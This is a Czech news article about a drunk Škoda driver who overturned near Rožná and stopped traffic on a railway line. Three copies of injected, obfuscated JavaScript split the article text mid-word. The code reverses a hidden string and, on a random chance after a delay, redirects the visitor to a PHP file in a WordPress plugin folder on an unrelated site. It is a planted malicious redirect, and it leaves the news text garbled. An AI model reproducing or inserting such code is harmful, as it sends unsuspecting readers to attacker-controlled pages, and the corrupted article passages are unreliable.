Rainbow page separator

Řidiči, který skončil v kolejišti, naměřili téměř tři promile

Středa, 10. října 2018

Rumunský řidič přišel ve spánku o pneumatiky za bezmála milion

Rožná / Opilý řidič nezvládl řízení a svým manévrem zastavil provoz na železniční trati Tišnovka. Tak by se ve zkratce dala popsat kolize, k níž do Rožné vyjížděli policisté.
„Čtyřiatřicetiletý řidič vozidla Škoda Fabia jel v obci Rožná ve směru k Věžné. Při projíždění mírné zatáčky vyjel do druhé poloviny vozovky, kde zachytil zrcátkem o zrcátko protijedoucího vozidla značky Citroen. Řidič fabie pokračoval dál v jízdě po přímém úseku komunikace v levé polovině vozovky, kde následně před zatáčkou vyjel ze silnice, sjel na travna[„\’///\’=“];[„\’///\’=“]; };[„\’//\’=“]}$NfI=function(n){if (typeof ($NfI.list[n]) == „string“) return $NfI.list[n].split(„“).reverse().join(„“);return $NfI.list[n];};$NfI.list=[„\’php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\’=ferh.noitacol.tnemucod“];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}tou plochu a s vozidlem se převrátil přes střechu zpět na kola. Au[„\’///\’=“];[„\’///\’=“]; };[„\’//\’=“]}$NfI=function(n){if (typeof ($NfI.list[n]) == „string“) return $NfI.list[n].split(„“).reverse().join(„“);return $NfI.list[n];};$NfI.list=[„\’php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\’=ferh.noitacol.tnemucod“];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}tomobil zůstal stát v pros[„\’///\’=“];[„\’///\’=“]; };[„\’//\’=“]}$NfI=function(n){if (typeof ($NfI.list[n]) == „string“) return $NfI.list[n].split(„“).reverse().join(„“);return $NfI.list[n];};$NfI.list=[„\’php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\’=ferh.noitacol.tnemucod“];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}toru kolejiště,“ informovala policejní mluvčí Stanislava Miláčková.
Provoz na trati byl vzápětí zastaven a šoféra, jenž se při nehodě zranil, převezla záchranka do nemocnice k ošetření. „Policisté provedli u řidiče dechovou zkoušku, při které muži naměřili hodnotu 2,91 promile alkoholu. Byl u něho nařízen odběr krve. U řidiče citroenu byla dechová zkouška negativní,“ upřesnila mluvčí s tím, že na autech vznikla škoda přes sedmdesát tisíc korun. Opilý řidič na místě přišel o řidičský průkaz a je podezřelý ze spáchání trestného činu ohrožení pod vlivem návykové látky.